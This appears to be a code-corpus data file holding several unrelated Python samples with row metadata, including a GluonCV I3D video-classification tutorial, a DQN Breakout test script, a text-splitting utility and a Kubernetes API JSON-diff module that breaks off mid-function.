{'item': BALL_SPRING, 'used': 2, 'unused': 0},
{'item': BALL_VELCRO, 'used': 0, 'unused': 1},
{'item': BOOST_OVERRIDE, 'used': 2, 'unused': 0},
{'item': CAR_SPRING, 'used': 1, 'unused': 1},
{'item': GRAVITY_WELL, 'used': 2, 'unused': 0},
{'item': STRONG_HIT, 'used': 2, 'unused': 0},
{'item': SWAPPER, 'used': 1, 'unused': 0},
{'item': TORNADO, 'used': 0, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.players[1].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 2, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 1, 'unused': 1},
{'item': BALL_LASSO, 'used': 1, 'unused': 0},
{'item': BALL_SPRING, 'used': 1, 'unused': 0},
{'item': BALL_VELCRO, 'used': 0, 'unused': 1},
{'item': BOOST_OVERRIDE, 'used': 2, 'unused': 0},
{'item': CAR_SPRING, 'used': 0, 'unused': 1},
{'item': GRAVITY_WELL, 'used': 2, 'unused': 0},
{'item': STRONG_HIT, 'used': 1, 'unused': 0},
{'item': SWAPPER, 'used': 2, 'unused': 0},
{'item': TORNADO, 'used': 0, 'unused': 1}
])
self.assert_rumble_item_counts(proto_game.players[2].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 1, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 0, 'unused': 0},
{'item': BALL_LASSO, 'used': 2, 'unused': 0},
{'item': BALL_SPRING, 'used': 1, 'unused': 0},
{'item': BALL_VELCRO, 'used': 1, 'unused': 1},
{'item': BOOST_OVERRIDE, 'used': 1, 'unused': 1},
{'item': CAR_SPRING, 'used': 0, 'unused': 0},
{'item': GRAVITY_WELL, 'used': 2, 'unused': 0},
{'item': STRONG_HIT, 'used': 2, 'unused': 0},
{'item': SWAPPER, 'used': 1, 'unused': 1},
{'item': TORNADO, 'used': 1, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.players[3].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 0, 'unused': 1},
{'item': BALL_GRAPPLING_HOOK, 'used': 1, 'unused': 1},
{'item': BALL_LASSO, 'used': 1, 'unused': 0},
{'item': BALL_SPRING, 'used': 1, 'unused': 0},
{'item': BALL_VELCRO, 'used': 1, 'unused': 0},
{'item': BOOST_OVERRIDE, 'used': 2, 'unused': 0},
{'item': CAR_SPRING, 'used': 2, 'unused': 0},
{'item': GRAVITY_WELL, 'used': 1, 'unused': 0},
{'item': STRONG_HIT, 'used': 1, 'unused': 0},
{'item': SWAPPER, 'used': 2, 'unused': 0},
{'item': TORNADO, 'used': 0, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.players[4].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 2, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 2, 'unused': 0},
{'item': BALL_LASSO, 'used': 2, 'unused': 0},
{'item': BALL_SPRING, 'used': 0, 'unused': 0},
{'item': BALL_VELCRO, 'used': 1, 'unused': 0},
{'item': BOOST_OVERRIDE, 'used': 2, 'unused': 0},
{'item': CAR_SPRING, 'used': 1, 'unused': 0},
{'item': GRAVITY_WELL, 'used': 2, 'unused': 0},
{'item': STRONG_HIT, 'used': 1, 'unused': 0},
{'item': SWAPPER, 'used': 1, 'unused': 1},
{'item': TORNADO, 'used': 0, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.players[5].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 2, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 2, 'unused': 0},
{'item': BALL_LASSO, 'used': 2, 'unused': 0},
{'item': BALL_SPRING, 'used': 1, 'unused': 0},
{'item': BALL_VELCRO, 'used': 1, 'unused': 0},
{'item': BOOST_OVERRIDE, 'used': 1, 'unused': 0},
{'item': CAR_SPRING, 'used': 2, 'unused': 0},
{'item': GRAVITY_WELL, 'used': 0, 'unused': 0},
{'item': STRONG_HIT, 'used': 2, 'unused': 0},
{'item': SWAPPER, 'used': 1, 'unused': 1},
{'item': TORNADO, 'used': 1, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.teams[0].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 2, 'unused': 1},
{'item': BALL_GRAPPLING_HOOK, 'used': 2, 'unused': 1},
{'item': BALL_LASSO, 'used': 4, 'unused': 0},
{'item': BALL_SPRING, 'used': 4, 'unused': 0},
{'item': BALL_VELCRO, 'used': 2, 'unused': 2},
{'item': BOOST_OVERRIDE, 'used': 5, 'unused': 1},
{'item': CAR_SPRING, 'used': 3, 'unused': 1},
{'item': GRAVITY_WELL, 'used': 5, 'unused': 0},
{'item': STRONG_HIT, 'used': 5, 'unused': 0},
{'item': SWAPPER, 'used': 4, 'unused': 1},
{'item': TORNADO, 'used': 1, 'unused': 0}
])
self.assert_rumble_item_counts(proto_game.teams[1].stats.rumble_stats, [
{'item': BALL_FREEZE, 'used': 6, 'unused': 0},
{'item': BALL_GRAPPLING_HOOK, 'used': 5, 'unused': 1},
{'item': BALL_LASSO, 'used': 5, 'unused': 0},
{'item': BALL_SPRING, 'used': 2, 'unused': 0},
{'item': BALL_VELCRO, 'used': 2, 'unused': 1},
{'item': BOOST_OVERRIDE, 'used': 5, 'unused': 0},
{'item': CAR_SPRING, 'used': 3, 'unused': 1},
{'item': GRAVITY_WELL, 'used': 4, 'unused': 0},
{'item': STRONG_HIT, 'used': 4, 'unused': 0},
{'item': SWAPPER, 'used': 4, 'unused': 2},
{'item': TORNADO, 'used': 1, 'unused': 1}
])
run_analysis_test_on_replay(test, get_raw_replays()["RUMBLE_FULL"])
def assert_rumble_item_counts(self, rumble_stats_proto, expected):
result_stats = list(map(proto_to_dict, rumble_stats_proto.rumble_items))
self.assertCountEqual(result_stats, expected)
def proto_to_dict(item_proto):
return {
'item': item_proto.item,
'used': item_proto.used,
'unused': item_proto.unused
}
| none | 1 | 2.437383 | 2 | |
docs/tutorials/action_recognition/demo_i3d_kinetics400.py | Kh4L/gluon-cv | 5,447 | 6616681 | """3. Getting Started with Pre-trained I3D Models on Kinetcis400
================================================================
`Kinetics400 <https://deepmind.com/research/open-source/kinetics>`_ is an action recognition dataset
of realistic action videos, collected from YouTube. With 306,245 short trimmed videos
from 400 action categories, it is one of the largest and most widely used dataset in the research
community for benchmarking state-of-the-art video action recognition models.
`I3D <https://arxiv.org/abs/1705.07750>`_ (Inflated 3D Networks) is a widely adopted 3D video
classification network. It uses 3D convolution to learn spatiotemporal information directly from videos.
I3D is proposed to improve `C3D <https://arxiv.org/abs/1412.0767>`_ (Convolutional 3D Networks) by inflating from 2D models.
We can not only reuse the 2D models' architecture (e.g., ResNet, Inception), but also bootstrap
the model weights from 2D pretrained models. In this manner, training 3D networks for video
classification is feasible and getting much better results.
In this tutorial, we will demonstrate how to load a pre-trained I3D model from :ref:`gluoncv-model-zoo`
and classify a video clip from the Internet or your local disk into one of the 400 action classes.
Step by Step
------------
We will try out a pre-trained I3D model on a single video clip.
First, please follow the `installation guide <../../index.html#installation>`__
to install ``MXNet`` and ``GluonCV`` if you haven't done so yet.
"""
import matplotlib.pyplot as plt
import numpy as np
import mxnet as mx
from mxnet import gluon, nd, image
from mxnet.gluon.data.vision import transforms
from gluoncv.data.transforms import video
from gluoncv import utils
from gluoncv.model_zoo import get_model
################################################################
# Then, we download the video and extract a 32-frame clip from it.
from gluoncv.utils.filesystem import try_import_decord
decord = try_import_decord()
url = 'https://github.com/bryanyzhu/tiny-ucf101/raw/master/abseiling_k400.mp4'
video_fname = utils.download(url)
vr = decord.VideoReader(video_fname)
frame_id_list = range(0, 64, 2)
video_data = vr.get_batch(frame_id_list).asnumpy()
clip_input = [video_data[vid, :, :, :] for vid, _ in enumerate(frame_id_list)]
################################################################
# Now we define transformations for the video clip.
# This transformation function does three things:
# center crop the image to 224x224 in size,
# transpose it to ``num_channels*num_frames*height*width``,
# and normalize with mean and standard deviation calculated across all ImageNet images.
transform_fn = video.VideoGroupValTransform(size=224, mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
clip_input = transform_fn(clip_input)
clip_input = np.stack(clip_input, axis=0)
clip_input = clip_input.reshape((-1,) + (32, 3, 224, 224))
clip_input = np.transpose(clip_input, (0, 2, 1, 3, 4))
print('Video data is downloaded and preprocessed.')
################################################################
# Next, we load a pre-trained I3D model.
model_name = 'i3d_inceptionv1_kinetics400'
net = get_model(model_name, nclass=400, pretrained=True)
print('%s model is successfully loaded.' % model_name)
################################################################
# Note that if you want to use InceptionV3 series model (i.e., i3d_inceptionv3_kinetics400),
# please resize the image to have both dimensions larger than 299 (e.g., 340x450) and change input size from 224 to 299
# in the transform function. Finally, we prepare the video clip and feed it to the model.
pred = net(nd.array(clip_input))
classes = net.classes
topK = 5
ind = nd.topk(pred, k=topK)[0].astype('int')
print('The input video clip is classified to be')
for i in range(topK):
print('\t[%s], with probability %.3f.'%
(classes[ind[i].asscalar()], nd.softmax(pred)[0][ind[i]].asscalar()))
################################################################
#
# We can see that our pre-trained model predicts this video clip
# to be ``abseiling`` action with high confidence.
################################################################
# Next Step
# ---------
#
# If you would like to dive deeper into training I3D models on ``Kinetics400``,
# feel free to read the next `tutorial on Kinetics400 <dive_deep_i3d_kinetics400.html>`__.
| """3. Getting Started with Pre-trained I3D Models on Kinetcis400
================================================================
`Kinetics400 <https://deepmind.com/research/open-source/kinetics>`_ is an action recognition dataset
of realistic action videos, collected from YouTube. With 306,245 short trimmed videos
from 400 action categories, it is one of the largest and most widely used dataset in the research
community for benchmarking state-of-the-art video action recognition models.
`I3D <https://arxiv.org/abs/1705.07750>`_ (Inflated 3D Networks) is a widely adopted 3D video
classification network. It uses 3D convolution to learn spatiotemporal information directly from videos.
I3D is proposed to improve `C3D <https://arxiv.org/abs/1412.0767>`_ (Convolutional 3D Networks) by inflating from 2D models.
We can not only reuse the 2D models' architecture (e.g., ResNet, Inception), but also bootstrap
the model weights from 2D pretrained models. In this manner, training 3D networks for video
classification is feasible and getting much better results.
In this tutorial, we will demonstrate how to load a pre-trained I3D model from :ref:`gluoncv-model-zoo`
and classify a video clip from the Internet or your local disk into one of the 400 action classes.
Step by Step
------------
We will try out a pre-trained I3D model on a single video clip.
First, please follow the `installation guide <../../index.html#installation>`__
to install ``MXNet`` and ``GluonCV`` if you haven't done so yet.
"""
import matplotlib.pyplot as plt
import numpy as np
import mxnet as mx
from mxnet import gluon, nd, image
from mxnet.gluon.data.vision import transforms
from gluoncv.data.transforms import video
from gluoncv import utils
from gluoncv.model_zoo import get_model
################################################################
# Then, we download the video and extract a 32-frame clip from it.
from gluoncv.utils.filesystem import try_import_decord
decord = try_import_decord()
url = 'https://github.com/bryanyzhu/tiny-ucf101/raw/master/abseiling_k400.mp4'
video_fname = utils.download(url)
vr = decord.VideoReader(video_fname)
frame_id_list = range(0, 64, 2)
video_data = vr.get_batch(frame_id_list).asnumpy()
clip_input = [video_data[vid, :, :, :] for vid, _ in enumerate(frame_id_list)]
################################################################
# Now we define transformations for the video clip.
# This transformation function does three things:
# center crop the image to 224x224 in size,
# transpose it to ``num_channels*num_frames*height*width``,
# and normalize with mean and standard deviation calculated across all ImageNet images.
transform_fn = video.VideoGroupValTransform(size=224, mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
clip_input = transform_fn(clip_input)
clip_input = np.stack(clip_input, axis=0)
clip_input = clip_input.reshape((-1,) + (32, 3, 224, 224))
clip_input = np.transpose(clip_input, (0, 2, 1, 3, 4))
print('Video data is downloaded and preprocessed.')
################################################################
# Next, we load a pre-trained I3D model.
model_name = 'i3d_inceptionv1_kinetics400'
net = get_model(model_name, nclass=400, pretrained=True)
print('%s model is successfully loaded.' % model_name)
################################################################
# Note that if you want to use InceptionV3 series model (i.e., i3d_inceptionv3_kinetics400),
# please resize the image to have both dimensions larger than 299 (e.g., 340x450) and change input size from 224 to 299
# in the transform function. Finally, we prepare the video clip and feed it to the model.
pred = net(nd.array(clip_input))
classes = net.classes
topK = 5
ind = nd.topk(pred, k=topK)[0].astype('int')
print('The input video clip is classified to be')
for i in range(topK):
print('\t[%s], with probability %.3f.'%
(classes[ind[i].asscalar()], nd.softmax(pred)[0][ind[i]].asscalar()))
################################################################
#
# We can see that our pre-trained model predicts this video clip
# to be ``abseiling`` action with high confidence.
################################################################
# Next Step
# ---------
#
# If you would like to dive deeper into training I3D models on ``Kinetics400``,
# feel free to read the next `tutorial on Kinetics400 <dive_deep_i3d_kinetics400.html>`__.
| en | 0.685093 | 3. Getting Started with Pre-trained I3D Models on Kinetcis400 ================================================================ `Kinetics400 <https://deepmind.com/research/open-source/kinetics>`_ is an action recognition dataset of realistic action videos, collected from YouTube. With 306,245 short trimmed videos from 400 action categories, it is one of the largest and most widely used dataset in the research community for benchmarking state-of-the-art video action recognition models. `I3D <https://arxiv.org/abs/1705.07750>`_ (Inflated 3D Networks) is a widely adopted 3D video classification network. It uses 3D convolution to learn spatiotemporal information directly from videos. I3D is proposed to improve `C3D <https://arxiv.org/abs/1412.0767>`_ (Convolutional 3D Networks) by inflating from 2D models. We can not only reuse the 2D models' architecture (e.g., ResNet, Inception), but also bootstrap the model weights from 2D pretrained models. In this manner, training 3D networks for video classification is feasible and getting much better results. In this tutorial, we will demonstrate how to load a pre-trained I3D model from :ref:`gluoncv-model-zoo` and classify a video clip from the Internet or your local disk into one of the 400 action classes. Step by Step ------------ We will try out a pre-trained I3D model on a single video clip. First, please follow the `installation guide <../../index.html#installation>`__ to install ``MXNet`` and ``GluonCV`` if you haven't done so yet. ################################################################ # Then, we download the video and extract a 32-frame clip from it. ################################################################ # Now we define transformations for the video clip. # This transformation function does three things: # center crop the image to 224x224 in size, # transpose it to ``num_channels*num_frames*height*width``, # and normalize with mean and standard deviation calculated across all ImageNet images. ################################################################ # Next, we load a pre-trained I3D model. ################################################################ # Note that if you want to use InceptionV3 series model (i.e., i3d_inceptionv3_kinetics400), # please resize the image to have both dimensions larger than 299 (e.g., 340x450) and change input size from 224 to 299 # in the transform function. Finally, we prepare the video clip and feed it to the model. ################################################################ # # We can see that our pre-trained model predicts this video clip # to be ``abseiling`` action with high confidence. ################################################################ # Next Step # --------- # # If you would like to dive deeper into training I3D models on ``Kinetics400``, # feel free to read the next `tutorial on Kinetics400 <dive_deep_i3d_kinetics400.html>`__. | 3.290787 | 3 |
test_agent.py | kzkadc/dqn_breakout | 0 | 6616682 | <filename>test_agent.py<gh_stars>0
# -*- coding: utf-8 -*-
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("model",help="model file")
parser.add_argument("-m","--movie",default=None,help="monitor")
parser.add_argument("-r","--random",action="store_true",help="random action")
parser.add_argument("-i","--image",default=None,help="capture images")
parser.add_argument("-q","--qplot",action="store_true",help="plot Q values")
args = parser.parse_args()
from main_breakout import *
import cv2
ENV_NAME = "Breakout-v0"
FRAME_NUM = 4 # 状態を構成するフレーム数
FRAME_SKIP = 4
QPLOT = args.qplot
MOVIE = args.movie is not None
if MOVIE: MOV_DIR = args.movie
RANDOM = args.random
IMAGE = args.image is not None
if IMAGE: IMG_DIR = args.image
env = Environment(ENV_NAME,FRAME_SKIP,FRAME_NUM)
env.timestep = 0
env.test_mode = True
agent = Agent(env.action_space)
if not RANDOM: agent.load_model(args.model)
agent.test_mode = True
if QPLOT:
out_file = open("plot_q_"+ENV_NAME+".csv","w")
out_file.write(ENV_NAME+"\nTimestep,V(s)\n")
if MOVIE:
env.to_movie_mode("./"+args.movie)
total_timestep = 0
for episode in xrange(1):
print "Episode {:d}:".format(episode)
#state = env.next_random_game()
env.env.reset()
for _ in xrange(env.frame_num):
state = env.step(0)[0]
done = False
total_reward = 0.0
timestep = 0
while not done:
timestep+=1
total_timestep+=1
if total_timestep % 100 == 0: print total_timestep
if QPLOT:
qvalue = agent.get_Q_values(state)
max_q = np.max(qvalue)
out_file.write("{:d},{:f}\n".format(timestep,max_q))
action = random.choice(env.action_space) if RANDOM else agent.select_action(state)
state,r,done,raw_obs = env.step(action,return_obs=True)
total_reward+=r
if IMAGE:
cv2.imwrite(("{}/obs{:05d}.png").format(IMG_DIR,total_timestep),raw_obs[:,:,::-1])
if QPLOT: out_file.close()
print " timestep={:d},total_reward={:.2f}".format(timestep,total_reward)
| <filename>test_agent.py<gh_stars>0
# -*- coding: utf-8 -*-
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("model",help="model file")
parser.add_argument("-m","--movie",default=None,help="monitor")
parser.add_argument("-r","--random",action="store_true",help="random action")
parser.add_argument("-i","--image",default=None,help="capture images")
parser.add_argument("-q","--qplot",action="store_true",help="plot Q values")
args = parser.parse_args()
from main_breakout import *
import cv2
ENV_NAME = "Breakout-v0"
FRAME_NUM = 4 # 状態を構成するフレーム数
FRAME_SKIP = 4
QPLOT = args.qplot
MOVIE = args.movie is not None
if MOVIE: MOV_DIR = args.movie
RANDOM = args.random
IMAGE = args.image is not None
if IMAGE: IMG_DIR = args.image
env = Environment(ENV_NAME,FRAME_SKIP,FRAME_NUM)
env.timestep = 0
env.test_mode = True
agent = Agent(env.action_space)
if not RANDOM: agent.load_model(args.model)
agent.test_mode = True
if QPLOT:
out_file = open("plot_q_"+ENV_NAME+".csv","w")
out_file.write(ENV_NAME+"\nTimestep,V(s)\n")
if MOVIE:
env.to_movie_mode("./"+args.movie)
total_timestep = 0
for episode in xrange(1):
print "Episode {:d}:".format(episode)
#state = env.next_random_game()
env.env.reset()
for _ in xrange(env.frame_num):
state = env.step(0)[0]
done = False
total_reward = 0.0
timestep = 0
while not done:
timestep+=1
total_timestep+=1
if total_timestep % 100 == 0: print total_timestep
if QPLOT:
qvalue = agent.get_Q_values(state)
max_q = np.max(qvalue)
out_file.write("{:d},{:f}\n".format(timestep,max_q))
action = random.choice(env.action_space) if RANDOM else agent.select_action(state)
state,r,done,raw_obs = env.step(action,return_obs=True)
total_reward+=r
if IMAGE:
cv2.imwrite(("{}/obs{:05d}.png").format(IMG_DIR,total_timestep),raw_obs[:,:,::-1])
if QPLOT: out_file.close()
print " timestep={:d},total_reward={:.2f}".format(timestep,total_reward)
| ja | 0.762184 | # -*- coding: utf-8 -*- # 状態を構成するフレーム数 #state = env.next_random_game() | 2.439267 | 2 |
src/syncabook/split_text.py | ishine/syncabook | 57 | 6616683 | <reponame>ishine/syncabook<filename>src/syncabook/split_text.py
import os
import re
from .utils import get_number_of_digits_to_name
def split_text(text_file, output_dir, mode, pattern, n):
"""
Splits contents of `text_file` into several texts and saves them to `output_dir`.
"""
with open(text_file, 'r') as f:
text = f.read()
if mode in ['opening', 'delimeter'] and pattern is None:
print(f'\n❌ --pattern is required in {mode} mode.\n')
return
if mode == 'opening':
texts = _split_text_by_opening(pattern, text)
elif mode == 'delimeter':
texts = _split_text_by_delimeter(pattern, text)
elif mode == 'equal':
if n is None:
print(f'\n❌ --n is required in {mode} mode.\n')
return
texts = _split_text_into_n_parts(n, text, output_dir)
else:
print(f'\n❌ Unknown mode {mode}.\n')
if len(texts) > 0:
_save_texts(texts, output_dir)
print(f'✔ Splitting into {len(texts)} files is performed.')
def _split_text_by_opening(pattern, text):
"""
Splits text into parts identified by opening that matches `pattern`.
For example, --pattern='\n\nCHAPTER \\d+\n\n' may be used
to split text into chapters.
"""
openings = re.findall(pattern, text)
if len(openings) == 0:
print(f'\n❗ No text matching pattern "{pattern}". Splitting is not performed.\n')
return []
texts = re.split(pattern, text)
texts = [d + t for d, t in zip(openings, texts[1:])]
return texts
def _split_text_by_delimeter(pattern, text):
"""
Splits text into parts separated by delimeter that matches `pattern`.
Delimeter is not included in the returned texts.
For example, --pattern='\n\n---------\n\n' may be used if
chapter are separated by 8 dashes.
"""
texts = re.split(pattern, text)
if len(texts) == 0:
print(f'\n❗ No text matching pattern "{pattern}". Splitting is not performed.\n')
return texts
def _split_text_into_n_parts(n, text, output_dir):
"""
Splits text into `n` approximately equal parts.
The splitting is permformed only at paragraphs' boundaries.
"""
l = len(text) // n
texts = []
cur_part_start = 0
for i in range(len(text)):
if i >= cur_part_start + l and text[i] == text[i+1] == '\n':
texts.append(text[cur_part_start:i+2])
cur_part_start = i + 2
texts.append(text[cur_part_start:])
return texts
def _save_texts(texts, output_dir):
os.makedirs(output_dir, exist_ok=True)
for i, text in enumerate(texts, start=1):
n = get_number_of_digits_to_name(len(texts))
file_path = os.path.join(output_dir, f'{i:0>{n}}.txt')
with open(file_path, 'w') as f:
f.write(text) | import os
import re
from .utils import get_number_of_digits_to_name
def split_text(text_file, output_dir, mode, pattern, n):
"""
Splits contents of `text_file` into several texts and saves them to `output_dir`.
"""
with open(text_file, 'r') as f:
text = f.read()
if mode in ['opening', 'delimeter'] and pattern is None:
print(f'\n❌ --pattern is required in {mode} mode.\n')
return
if mode == 'opening':
texts = _split_text_by_opening(pattern, text)
elif mode == 'delimeter':
texts = _split_text_by_delimeter(pattern, text)
elif mode == 'equal':
if n is None:
print(f'\n❌ --n is required in {mode} mode.\n')
return
texts = _split_text_into_n_parts(n, text, output_dir)
else:
print(f'\n❌ Unknown mode {mode}.\n')
if len(texts) > 0:
_save_texts(texts, output_dir)
print(f'✔ Splitting into {len(texts)} files is performed.')
def _split_text_by_opening(pattern, text):
"""
Splits text into parts identified by opening that matches `pattern`.
For example, --pattern='\n\nCHAPTER \\d+\n\n' may be used
to split text into chapters.
"""
openings = re.findall(pattern, text)
if len(openings) == 0:
print(f'\n❗ No text matching pattern "{pattern}". Splitting is not performed.\n')
return []
texts = re.split(pattern, text)
texts = [d + t for d, t in zip(openings, texts[1:])]
return texts
def _split_text_by_delimeter(pattern, text):
"""
Splits text into parts separated by delimeter that matches `pattern`.
Delimeter is not included in the returned texts.
For example, --pattern='\n\n---------\n\n' may be used if
chapter are separated by 8 dashes.
"""
texts = re.split(pattern, text)
if len(texts) == 0:
print(f'\n❗ No text matching pattern "{pattern}". Splitting is not performed.\n')
return texts
def _split_text_into_n_parts(n, text, output_dir):
"""
Splits text into `n` approximately equal parts.
The splitting is permformed only at paragraphs' boundaries.
"""
l = len(text) // n
texts = []
cur_part_start = 0
for i in range(len(text)):
if i >= cur_part_start + l and text[i] == text[i+1] == '\n':
texts.append(text[cur_part_start:i+2])
cur_part_start = i + 2
texts.append(text[cur_part_start:])
return texts
def _save_texts(texts, output_dir):
os.makedirs(output_dir, exist_ok=True)
for i, text in enumerate(texts, start=1):
n = get_number_of_digits_to_name(len(texts))
file_path = os.path.join(output_dir, f'{i:0>{n}}.txt')
with open(file_path, 'w') as f:
f.write(text) | en | 0.872583 | Splits contents of `text_file` into several texts and saves them to `output_dir`. Splits text into parts identified by opening that matches `pattern`. For example, --pattern='\n\nCHAPTER \\d+\n\n' may be used to split text into chapters. Splits text into parts separated by delimeter that matches `pattern`. Delimeter is not included in the returned texts. For example, --pattern='\n\n---------\n\n' may be used if chapter are separated by 8 dashes. Splits text into `n` approximately equal parts. The splitting is permformed only at paragraphs' boundaries. | 3.83996 | 4 |
kab/kab/core/jsondiff.py | tengqm/kab | 3 | 6616684 | <filename>kab/kab/core/jsondiff.py
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import copy
import logging
import os
from django.conf import settings
from kab import consts
from kab.core import helpers
from kab.core import jsonutil
LOG = logging.getLogger(__name__)
class Diff(object):
def __init__(self, first, second, with_values=False):
self.difference = []
self.seen = []
self.check(first, second, with_values=with_values)
def check(self, first, second, path='', with_values=False):
if with_values and second is not None:
if not isinstance(first, type(second)):
message = '%s;; %s||%s' % (path, type(first).__name__,
type(second).__name__)
self.save("TYPE", message)
if isinstance(first, dict):
for key in first:
# the first part of path must not have trailing dot.
if len(path) == 0:
new_path = key
else:
new_path = "%s.%s" % (path, key)
message = new_path
if isinstance(second, dict):
if key in second:
sec = second[key]
else:
# key only in the first
self.save("PATH", message)
# prevent further values checking.
sec = None
# recursive call
if sec is not None:
self.check(first[key], sec, path=new_path,
with_values=with_values)
else:
# second is not dict.
# every key from first goes to the difference
self.save("PATH", message)
self.check(first[key], second, path=new_path,
with_values=with_values)
# if object is list, loop over it and check.
elif isinstance(first, list):
if not isinstance(second, list):
type1 = type(first).__name__
type2 = type(second).__name__
msg = '%s;; %s||%s' % (path, type1, type2)
self.save("TYPE", msg)
return
# process simple type
if not isinstance(first[0], (dict, list)):
first = sorted(first)
second = sorted(second)
if first != second:
msg = "%s;; %s||%s" % (path, first, second)
self.save("VALUE", msg)
return
for index, item in enumerate(first):
new_path = "%s[%s]" % (path, index)
sec = None
try:
sec = second[index]
self.check(item, sec, path=new_path,
with_values=with_values)
except (IndexError, KeyError):
msg = '%s;; %s||' % (new_path, str(item))
self.save("VALUE", msg)
# not list, not dict.
# check for equality (only if with_values is True) and return.
else:
if with_values and second is not None:
if first != second:
msg = "%s;; %s||%s" % (path, first, second)
self.save("VALUE", msg)
return
def save(self, kind, message):
if message not in self.difference:
self.seen.append(message)
self.difference.append((kind, message))
def compare_data(json1, json2):
"""Return the difference between two JSON.
The result looks like:
{
"ADDED": [
"foo.bar",
"zoo"
],
"REMOVED": [
"car.path[*].field"
],
"DESCRIPTION": {
"field.path1": {
"BEFORE": "text1",
"AFTER": "text2"
},
"(The resource)": {
"BEFORE": "old text",
"AFTER": "new text"
}
},
"CHANGED": [
"field.path": {
"BEFORE": "something",
"AFTER": "else"
}
]
}
"""
# first round check removed properties and changed values
diff1 = Diff(json1, json2, True).difference
# second round check newly added properties
diff2 = Diff(json2, json1, False).difference
diffs = []
for kind, message in diff1:
newType = "REMOVED" if kind == "PATH" else "CHANGED"
diffs.append({'type': newType, 'message': message})
for kind, message in diff2:
# ignore value changes
if kind == "VALUE":
continue
diffs.append({'type': "ADDED", 'message': message})
result = {}
for diff in diffs:
key = diff['type']
value = diff['message']
if (key == "CHANGED"):
key_vals = value.split(';;')
vals = key_vals[1].split('||')
keypath = key_vals[0].replace("properties.", "")
keypath = keypath.replace(".items.", "[*].")
if keypath.endswith(".description"):
key = "DESCRIPTION"
keypath = keypath[:-12]
elif keypath == "description":
key = "DESCRIPTION"
keypath = "(The Resource)"
value = {
keypath: {
"BEFORE": vals[0].strip(),
"AFTER": vals[1].strip(),
}
}
else:
# handle pseudo jsonpath for object properties and array items
value = value.replace("properties.", "")
value = value.replace(".items.", "[*].")
out_vals = result.get(key)
if (out_vals):
out_vals.append(value)
result[key] = out_vals
else:
result[key] = [value]
return result
def compare(apis, file1, file2, root=None, recursive=True):
"""Compare two JSON files.
:param apis: The APIs for the two files.
:param file1: Name for the first definition file.
:param file2: Name for the second definition file.
:returns: None if either one of the data cannot be loaded.
"""
json1 = jsonutil.load_json(file1, apis[0], root=root, recursive=recursive)
if json1 is None:
return None
json2 = jsonutil.load_json(file2, apis[-1], root=root, recursive=recursive)
if json2 is None:
return None
return compare_data(json1, json2)
def _definition_filename(api, group, version, kind, root=None):
if root is None:
if settings.configured:
fmt = settings.DATA_DIR + "/{}/defs/{}.json"
else:
fmt = "data/{}/defs/{}.json"
else:
fmt = root + "/{}/defs/{}.json"
if kind == "Info":
fn = "io.k8s.apimachinery.pkg.version.Info"
elif kind == "IntOrString":
fn = "io.k8s.apimachinery.pkg.util.intstr.IntOrString"
elif kind == "RawExtension":
fn = "io.k8s.apimachinery.pkg.runtime.RawExtension"
elif kind == "Quantity":
fn = "io.k8s.apimachinery.pkg.api.resource.Quantity"
else:
fn = ".".join([group, version, kind])
return fmt.format(api, fn)
def compare_defs(apis, groups, versions, kinds, root=None):
file0 = _definition_filename(apis[0], groups[0], versions[0], kinds[0])
file1 = _definition_filename(apis[-1], groups[-1], versions[-1], kinds[-1])
return compare(apis, file0, file1, root=root)
def _populate_parameters(apiv, param_list):
param_dict = helpers.parameters(apiv)
data = {}
for p in param_list:
if "$ref" not in p:
data[p["name"]] = p
continue
pref = p.pop("$ref")
param_name = pref[13:]
if param_name not in param_dict:
LOG.warning("Parameter %s not found!", param_name)
continue
item = copy.deepcopy(p)
item.update(param_dict.get(param_name))
data[item["name"]] = item
return collections.OrderedDict(sorted(data.items()))
def compare_ops(apis, opids, root=None):
"""Returns the diff between any two operations.
The returned result looks like:
{
/* basic JSON diff for operation definition JSON */
"P_ADDED": {
"p1": "<HTML formatted text>",
"p2": "<HTML formatted desc>"
},
"P_REMOVED": {
"p0": "<HTML formatted text>"
},
"P_CHANGED": {
"p3": {
"BEFORE": "raw data",
"AFTER": "raw data"
}
}
"""
if root is None:
fmt = helpers.DATA_PATH + "/{}/ops/{}.json"
else:
fmt = root + "/{}/ops/{}.json"
file0 = fmt.format(apis[0], opids[0])
file1 = fmt.format(apis[-1], opids[-1])
json1 = jsonutil.load_json(file0, apis[0], recursive=False)
if json1 is None:
return None
json2 = jsonutil.load_json(file1, apis[-1], recursive=False)
if json2 is None:
return None
# basic JSON diff
params1 = json1.pop("parameters", [])
params2 = json2.pop("parameters", [])
result = compare_data(json1, json2)
# handle the parameters
parameters1 = _populate_parameters(apis[0], params1)
parameters2 = _populate_parameters(apis[-1], params2)
for p, v in parameters1.items():
if p not in parameters2:
removed = result.get("P_REMOVED", {})
removed[p] = v
result["P_REMOVED"] = removed
elif parameters1[p] != parameters2[p]:
changed = result.get("P_CHANGED", {})
items1 = sorted(parameters1[p].items())
items2 = sorted(parameters2[p].items())
changed[p] = {
"BEFORE": collections.OrderedDict(sorted(items1)),
"AFTER": collections.OrderedDict(sorted(items2)),
}
result["P_CHANGED"] = changed
for p, v in parameters2.items():
